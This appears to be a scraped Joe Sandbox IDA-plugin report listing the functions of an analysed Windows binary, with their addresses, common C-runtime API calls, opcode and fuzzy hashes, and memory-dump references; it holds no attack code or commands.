Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: _localtime64_s$msvcrt.dll
API String ID: 1646373207-3474473506
Opcode ID: e6433b476ba74e81b9775fec21bde56a003506d6abc8a6f67e439d4aff4a0d78
Instruction ID: a420a20bf855430324d8e53969a62a5b1cae2a5c24588df027980f9000e63e12
Opcode Fuzzy Hash: e6433b476ba74e81b9775fec21bde56a003506d6abc8a6f67e439d4aff4a0d78
Instruction Fuzzy Hash: 89F0DA64B0EA5691EE45DF46ED940B42362AF58BD1FA84436DC0D83361FE6CA5898300

Function 00007FF6099B2BB0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6099B2BD6
GetProcAddress.KERNEL32 ref: 00007FF6099B2BE6

Strings

_localtime64_s, xrefs: 00007FF6099B2BDC
msvcrt.dll, xrefs: 00007FF6099B2BCF

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: _localtime64_s$msvcrt.dll
API String ID: 1646373207-3474473506
Opcode ID: 996eddf4707004b26ca684804fcf8aaff092c600e71e1cc29f878679b6fdd581
Instruction ID: 3763de4dac2272f0242635a3e5289398d34d283646ab18314ba1a8d58246e87c
Opcode Fuzzy Hash: 996eddf4707004b26ca684804fcf8aaff092c600e71e1cc29f878679b6fdd581
Instruction Fuzzy Hash: B2F0DA64B0EA5691EE45DF46ED940B42362AF58BD1FA84436DC0DC3361FE6CA5898300

Function 00007FF6099D2CD0 Relevance: 6.4, APIs: 5, Instructions: 141COMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32 ref: 00007FF6099D2D71
LeaveCriticalSection.KERNEL32 ref: 00007FF6099D2DAA
free.MSVCRT ref: 00007FF6099D2E1D
LeaveCriticalSection.KERNEL32 ref: 00007FF6099D2E46

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: CriticalLeaveSection$free
String ID:
API String ID: 2017658852-0
Opcode ID: 21f2af2da6d99c8440ba50e04c259726af40d8d037963cadd681417a98c49a5a
Instruction ID: 4d3bd39b06daf9f4cfc5a778904774a0dfd4e755523ecc0b58a3278b3bc6c756
Opcode Fuzzy Hash: 21f2af2da6d99c8440ba50e04c259726af40d8d037963cadd681417a98c49a5a
Instruction Fuzzy Hash: A7516B21A1BA4681FB549F05E99537963A3AF64B94F3C0435CD6E877A2EF3CE481C350

Function 00007FF6099BDC20 Relevance: 6.4, APIs: 5, Instructions: 129COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00007FF6099BDC93
memcpy.MSVCRT ref: 00007FF6099BDCC4
free.MSVCRT ref: 00007FF6099BDD7E
memcpy.MSVCRT ref: 00007FF6099BDDAF
free.MSVCRT ref: 00007FF6099BDDF8

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: free$memcpy
String ID:
API String ID: 4107583993-0
Opcode ID: 8e1b853cacffe1525c6de4d4fc907dd5a3da612f1d84b0e28030ca1136726b77
Instruction ID: a11ef4ddeeb90b86b1967bd4d6df1dff1eba0a70563978dbfb20fdfd50448db9
Opcode Fuzzy Hash: 8e1b853cacffe1525c6de4d4fc907dd5a3da612f1d84b0e28030ca1136726b77
Instruction Fuzzy Hash: D35109B2605B9187DA64CF16F5886AAB3B9F744784F254135CBDE83BA1EF3DE0918300

Function 00007FF6099BABE0 Relevance: 6.3, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00007FF6099BAC20
free.MSVCRT ref: 00007FF6099BAC38
free.MSVCRT ref: 00007FF6099BAC50
free.MSVCRT ref: 00007FF6099BAC68
free.MSVCRT ref: 00007FF6099BACAB

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 77491b3431e31e0df476f0c4b973149adff1a1b304b4d0bc1a179ca6df4f626d
Instruction ID: 851d5f15d01092542780299c4da9203f3c52c8e3fba25699bdd696af3cf527c2
Opcode Fuzzy Hash: 77491b3431e31e0df476f0c4b973149adff1a1b304b4d0bc1a179ca6df4f626d
Instruction Fuzzy Hash: 8B118726A0B58646DDAADE16E1941F953A6EF44780F6C0131DB9F87B93DE2DE582C300

Function 00007FF6099BD5C0 Relevance: 6.3, APIs: 4, Instructions: 273COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6099BD703
memcpy.MSVCRT ref: 00007FF6099BD722
malloc.MSVCRT ref: 00007FF6099BD7C0

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: malloc$memcpy
String ID:
API String ID: 3800483350-0
Opcode ID: 02b9ae5a013ee2f29f00789c869f89056a85886b2e4cff7aeeaac901525a1d51
Instruction ID: 7de5ff840fea9d0375ac7249ce23984e2338521b769ed7fef4f46693ab6c0600
Opcode Fuzzy Hash: 02b9ae5a013ee2f29f00789c869f89056a85886b2e4cff7aeeaac901525a1d51
Instruction Fuzzy Hash: C2A1C6A3A0AB4685FA618F15E94027D67A2AB44B94F2C4531DF9D877D6EF3CE482C300

Function 00007FF6099B64F0 Relevance: 6.2, APIs: 4, Instructions: 241COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF6099B65A4

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 06bcf27b9f9da240dc0868757c2916d576c3230e37a736bb9f8626e71eb8801a
Instruction ID: 7321064d2cce6e3e4d8c1e23ca361c4a4704cd3264a4021878b4b3cad22d5dda
Opcode Fuzzy Hash: 06bcf27b9f9da240dc0868757c2916d576c3230e37a736bb9f8626e71eb8801a
Instruction Fuzzy Hash: 2791A772A1424287E7348E2AE69477977B6EB147A4F288135CB5AC7BD2DF2CF451CB00

Function 00007FF6099D0F70 Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF6099D1024

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 3c04a9d5fa0e69046c5dc2e7c457146978f8f163ab23e189bd4247a93fbb4af8
Instruction ID: cf69727a6abc6136b61f79d035ac864db59edb99da5397bb84eeb5f878093cfa
Opcode Fuzzy Hash: 3c04a9d5fa0e69046c5dc2e7c457146978f8f163ab23e189bd4247a93fbb4af8
Instruction Fuzzy Hash: CF91A533A0E28687F7388E6AD58477976A2EB15794F288135CB5AC77C2DF2DF4818740

Function 00007FF6099CF3D0 Relevance: 6.2, APIs: 4, Instructions: 186COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6099CF46E
realloc.MSVCRT ref: 00007FF6099CF4B5
realloc.MSVCRT ref: 00007FF6099CF532
realloc.MSVCRT ref: 00007FF6099CF5ED

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc
String ID:
API String ID: 471065373-0
Opcode ID: 1e285367feb4afe0847244d2031beab91f6261c59615f80f46d5ac3eaa156d84
Instruction ID: ecd92469852d430bc45c87eee581c0d79a08a3141dfd07e6c72dc4bb8e20251a
Opcode Fuzzy Hash: 1e285367feb4afe0847244d2031beab91f6261c59615f80f46d5ac3eaa156d84
Instruction Fuzzy Hash: 7E7124B6A09B9583DE248F16E9541797763EB58BC0F248832DB9E877A5DF3CE442C300

Function 00007FF6099C97B0 Relevance: 6.2, APIs: 4, Instructions: 163COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6099C97F3
realloc.MSVCRT ref: 00007FF6099C9874
realloc.MSVCRT ref: 00007FF6099C98B4
realloc.MSVCRT ref: 00007FF6099C9943

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc
String ID:
API String ID: 471065373-0
Opcode ID: 178bcdf490fc3efe4e1ec1d5bd69b4c8c4ebade7a4d419b1369cd77cbe23b087
Instruction ID: 6460e802e6b8c34ef31935d5bf8b64d4d12872986620687b3af51a27391a6aa6
Opcode Fuzzy Hash: 178bcdf490fc3efe4e1ec1d5bd69b4c8c4ebade7a4d419b1369cd77cbe23b087
Instruction Fuzzy Hash: 9D5192B2A09B8582EF258F16E45426D7762EB98FC4F188532CB8E47765DF3CD4968300

Function 00007FF6099C99D0 Relevance: 6.2, APIs: 4, Instructions: 156COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6099C9A09
realloc.MSVCRT ref: 00007FF6099C9A8A
realloc.MSVCRT ref: 00007FF6099C9B10
realloc.MSVCRT ref: 00007FF6099C9B6B

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc
String ID:
API String ID: 471065373-0
Opcode ID: 9213ca56535c4578a33ced58ccc4a0381c131ebe365f39c6624de3ce32fe5848
Instruction ID: c6b193876db6496d5ac966326c259d3b6e59fdd1fa91e6a4a6be434771d007a4
Opcode Fuzzy Hash: 9213ca56535c4578a33ced58ccc4a0381c131ebe365f39c6624de3ce32fe5848
Instruction Fuzzy Hash: 2E517FB6A09B8582EF25CF16E45426D7762EB58FC4B188432CB9E477A6DF3CD4968200

Function 00007FF6099BE7E0 Relevance: 6.1, APIs: 4, Instructions: 143COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6099BE929

Part of subcall function 00007FF6099BEC60: malloc.MSVCRT ref: 00007FF6099BED36

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 4e796562e045bc2085d3b63e2954ae181bebf3aa6fa207e791bf8cbf0b0f1a7d
Instruction ID: 8a2660bdc29f7dcf45126e9bbd2d188ea737f587b196e058377ca83b3e97b29a
Opcode Fuzzy Hash: 4e796562e045bc2085d3b63e2954ae181bebf3aa6fa207e791bf8cbf0b0f1a7d
Instruction Fuzzy Hash: 9451A03260AB4695EA958F61E6402FC37AAFB04781F694931DF9C8B382DF3CE465C350

Function 00007FF6099C0720 Relevance: 6.1, APIs: 4, Instructions: 135stringCOMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6099C0756
malloc.MSVCRT ref: 00007FF6099C076B
malloc.MSVCRT ref: 00007FF6099C07FE
strlen.MSVCRT ref: 00007FF6099C0833

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: malloc$reallocstrlen
String ID:
API String ID: 2374275640-0
Opcode ID: bbc9eb8fda263d5572ec69c747bc96ed4425b9f9bdd2f426fc37a50d399e2334
Instruction ID: 73d3e2bd904e6dc423afd103a7b439ad65e05d3f4f8995e175e6e2df6c9a8a49
Opcode Fuzzy Hash: bbc9eb8fda263d5572ec69c747bc96ed4425b9f9bdd2f426fc37a50d399e2334
Instruction Fuzzy Hash: F341096260674592EF29DF26E8406AC37A5EB08B94F6C4931DF9D4B792DF3CD5A2C300

Function 00007FF6099D2F20 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF6099D2F8D
free.MSVCRT ref: 00007FF6099D3093
LeaveCriticalSection.KERNEL32 ref: 00007FF6099D30C7

Strings

, xrefs: 00007FF6099D2F6D

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: CriticalLeaveSectionfreememset
String ID:
API String ID: 1662925646-3916222277
Opcode ID: 0ec8e0e19579407a327e1592c23b44f66c2b945ff42066c7724425ab7031865f
Instruction ID: 8c2cd7af4a45c4760ef749ce43b1de582aa66cb593c55e8b8340c4ca833c1059
Opcode Fuzzy Hash: 0ec8e0e19579407a327e1592c23b44f66c2b945ff42066c7724425ab7031865f
Instruction Fuzzy Hash: 0F411762A0A64297EA258F25D48117C7762FB547A9F688331CA6F837D2DF3CF586C340

Function 00007FF6099C8FC0 Relevance: 6.1, APIs: 4, Instructions: 131COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6099C8FEC
realloc.MSVCRT ref: 00007FF6099C90A9
realloc.MSVCRT ref: 00007FF6099C9101
memcpy.MSVCRT ref: 00007FF6099C911B

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc$mallocmemcpy
String ID:
API String ID: 1059646398-0
Opcode ID: 302b9d3f0cf64db1bf55221c519113ff95167a7d3676b02519fd1c4a4701ce77
Instruction ID: 5343a336f6cd21a1b5ebdda242c4a29b97f3974af79b36e4ed3c354f0a1a1440
Opcode Fuzzy Hash: 302b9d3f0cf64db1bf55221c519113ff95167a7d3676b02519fd1c4a4701ce77
Instruction Fuzzy Hash: 1F41A8A2A05F8182EF298F15F5413AD7361EB58BC8F288535DB9D47396EF2CD591C300

Function 00007FF6099CB9A0 Relevance: 6.1, APIs: 4, Instructions: 129COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6099CB9D6
realloc.MSVCRT ref: 00007FF6099CBA9E
realloc.MSVCRT ref: 00007FF6099CBB07
memcpy.MSVCRT ref: 00007FF6099CBB23

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc$mallocmemcpy
String ID:
API String ID: 1059646398-0
Opcode ID: 0d7666657fd6939fd31a0668dc5394f8c5ed6a9fe7f585d47596b9263e8e10d9
Instruction ID: 5e4d17c81a9573403fe39cb970f4bd6a35d76b847ab4a1b52d263d80a5009c5b
Opcode Fuzzy Hash: 0d7666657fd6939fd31a0668dc5394f8c5ed6a9fe7f585d47596b9263e8e10d9
Instruction Fuzzy Hash: 5641E7B2A06B8182DB158F16E88436D77A5EB54BC4F198531DF9D4B7A2DF3CD542C300

Function 00007FF6099C9D00 Relevance: 6.1, APIs: 4, Instructions: 129COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6099C9D3C
realloc.MSVCRT ref: 00007FF6099C9DC0
realloc.MSVCRT ref: 00007FF6099C9E10
realloc.MSVCRT ref: 00007FF6099C9E94

Memory Dump Source

Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true

Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd

Similarity

API ID: realloc
String ID:
API String ID: 471065373-0
Opcode ID: fbc8c95ca6f8518ba7c3563b4af5def5134fbf6b9430f51e1a2fd6be112007f3
